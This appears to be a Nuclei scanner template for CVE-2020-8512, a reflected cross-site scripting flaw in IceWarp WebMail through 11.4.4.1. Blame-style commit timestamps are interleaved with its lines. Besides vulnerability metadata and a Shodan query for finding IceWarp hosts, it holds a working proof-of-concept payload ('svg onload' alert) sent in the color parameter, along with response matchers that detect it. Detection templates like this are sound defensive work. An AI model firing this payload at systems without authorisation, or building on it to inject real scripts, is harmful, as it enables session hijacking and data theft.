2021-01-02 04:56:15 +00:00
id : CVE-2020-8512
2020-06-26 03:44:54 +00:00
info :
2022-09-08 13:28:46 +00:00
name : IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
2021-06-09 12:20:56 +00:00
author : pdteam,dwisiswant0
2020-06-26 03:44:54 +00:00
severity : medium
2022-09-08 13:28:46 +00:00
description : IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 07:00:21 +00:00
- https://www.exploit-db.com/exploits/47988
- https://twitter.com/sagaryadav8742/status/1275170967527006208
2022-05-17 09:18:12 +00:00
- https://cxsecurity.com/issue/WLB-2020010205
- https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8512
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8512
cwe-id : CWE-79
2023-11-21 02:35:29 +00:00
epss-score : 0.01373
2024-01-14 13:49:27 +00:00
epss-percentile : 0.8485
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
2022-07-10 09:37:34 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : icewarp
product : icewarp_server
2023-09-06 12:22:36 +00:00
shodan-query : title:"icewarp"
2024-01-14 09:21:50 +00:00
tags : cve,cve2020,edb,packetstorm,xss,icewarp
2020-06-26 03:44:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-06-26 03:44:54 +00:00
- method : GET
path :
2020-09-04 05:55:13 +00:00
- '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
2023-07-11 19:49:27 +00:00
2020-07-10 20:30:14 +00:00
matchers-condition : and
2020-06-26 03:44:54 +00:00
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-06-26 03:44:54 +00:00
words :
2020-09-04 05:55:13 +00:00
- "<svg/onload=alert(document.domain)>"
2023-09-10 14:31:33 +00:00
- "<strong>IceWarp"
condition : and
2023-07-11 19:49:27 +00:00
2020-12-13 19:24:23 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-12-13 19:24:23 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 490a00463044022034c24febc030e43134e60b036256ddbd453fea9b60f79df8c7fbf146a54379eb0220765849ebfbb5ab1a36bc13674db090308f7d6038803186df4f41fcbcf048d96e:922c64590222798bb761d5b6d8e72950